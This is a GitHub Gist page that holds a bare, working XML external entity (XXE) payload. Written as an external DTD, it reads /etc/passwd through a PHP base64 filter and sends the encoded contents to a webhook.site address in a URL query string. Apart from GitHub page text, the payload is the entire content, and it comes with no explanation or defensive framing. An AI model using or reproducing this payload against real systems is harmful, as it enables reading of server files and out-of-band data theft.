Last active
February 1, 2023 17:43
-
-
Save ajdumanhug/50e5df279e149973025990ff096cdffd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> | |
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b/?data=%file;'>"> | |
%xxe; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Working